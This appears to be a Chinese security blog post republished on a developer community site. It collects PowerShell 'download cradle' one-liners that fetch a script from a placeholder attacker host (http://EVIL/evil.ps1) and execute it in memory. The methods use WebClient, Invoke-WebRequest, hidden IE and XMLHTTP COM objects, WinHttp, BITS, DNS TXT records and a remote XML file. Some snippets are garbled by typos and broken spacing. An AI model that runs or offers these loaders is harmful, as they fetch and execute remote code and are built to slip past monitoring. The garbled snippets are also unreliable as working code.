前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >一些有趣的powershell加载命令

一些有趣的powershell加载命令

作者头像
黑白天安全
发布2021-03-16 10:46:48
1.5K0
发布2021-03-16 10:46:48
举报
文章被收录于专栏:黑白天安全团队

普通下载

代码语言:javascript
复制
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")

PowerShell 3.0+

代码语言:javascript
复制
IEX (iwr 'http://EVIL/evil.ps1')

隐藏的IE com对象

代码语言:javascript
复制
$ie=New-Object -comobject InternetExplorer.Application;
$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');
start-sleep -s 5;
$r=$ie.Document.body.innerHTML;
$ie.quit();
IEX $r

Msxml2.XMLHTTP COM对象

代码语言:javascript
复制
$h=New-Object -ComObject Msxml2.XMLHTTP
$h.open('GET','http://EVIL/evil.ps1',$false);
$h.send();
iex $h.responseText

WinHttp COM对象(不识别代理!)

代码语言:javascript
复制
$ h = new-object -com WinHttp.WinHttpRequest.5.1; 
$ h.open('GET',' http://EVIL/evil.ps1',$false); 
$ h.send(); 
iex $ h.qesponseText

使用bitstransfer

代码语言:javascript
复制
Import-Module bitstransfer; 
Start-BitsTransfer'http ://EVIL/evil.ps1'$ env:temp \ t; 
$ r = gc $ env:temp \ t; rm $ env:tempt; 
iex $ r

PowerBreach的DNS TXT方法

要执行的代码必须是存储在TXT记录中的base64编码的字符串

代码语言:javascript
复制
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
代码语言:javascript
复制
<#
<?xml version="1.0"?>
<command>
   <a>
      <execute>Get-Process</execute>
   </a>
  </command>
#>

$a = New-Object System.Xml.XmlDocument
$a.Load("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt")
$a.command.a.execute | iex
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-03-05,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑白天实验室 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 普通下载
  • PowerShell 3.0+
  • 隐藏的IE com对象
  • Msxml2.XMLHTTP COM对象
  • WinHttp COM对象(不识别代理!)
  • 使用bitstransfer
  • PowerBreach的DNS TXT方法
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档